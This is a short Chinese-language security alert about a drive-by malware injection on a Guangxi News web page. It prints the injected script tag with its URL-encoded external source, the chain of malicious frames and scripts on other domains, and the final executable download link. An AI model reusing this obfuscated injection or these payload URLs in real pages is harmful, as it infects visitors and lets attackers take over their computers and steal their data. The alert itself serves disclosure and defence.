广西新闻网被植入恶意代码

　　广西新闻网（http://www.gxnews.com.cn/）被植入恶意代码。　　用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。　　MalUrl:http://www.gxnews.com.cn/stati ...

　　广西新闻网（http://www.gxnews.com.cn/）被植入恶意代码。

　　用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

　　MalUrl:http://www.gxnews.com.cn/staticpages/20061021/newgx4539df75-847704.shtml

　　网页被嵌入恶意链接代码：

　　<script language=”javascript” type=”text/javascript” src=”http://%77%77%77%2E%63%72%63%66%2E%6F%72%67%2E%63%6E/%6C%6F%67%6F%2E%67%69%66″></script>

　　挂马分析：

　　[wide]http://www.gxnews.com.cn/staticpages/20061021/newgx4539df75-847704.shtml

　　[script]http://%77%77%77%2e%63%72%63%66%2e%6f%72%67%2e%63%6e/%6c%6f%67%6f%2e%67%69%66

　　[frame]http://11sdasew.cn/08/0008.htm?22

　　[frame]http://11sdasew.cn/08/index.html

　　[frame]http://11sdasew.cn/08/ytqm.htm

　　[script]http://11sdasew.cn/08/js.js

　　[frame]http://11sdasew.cn/08/yt14.htm

　　[frame]http://11sdasew.cn/08/ytfl.htm

　　[frame]http://11sdasew.cn/08/ytff.htm

　　[frame]http://11sdasew.cn/08/ytvod.htm

　　[frame]http://11sdasew.cn/08/ytxxz.htm

　　[frame]http://11sdasew.cn/08/ytlb.htm

　　[frame]http://11sdasew.cn/08/yt122121.htm

　　[script]http://js.tongji.cn.yahoo.com/1116244/ystat.js

　　最终下载病毒文件：

　　http://qjdiejs.cn/8.exe

　　通过执行以上病毒文件，来达到完全控制访问者的系统。

关键字：恶意代码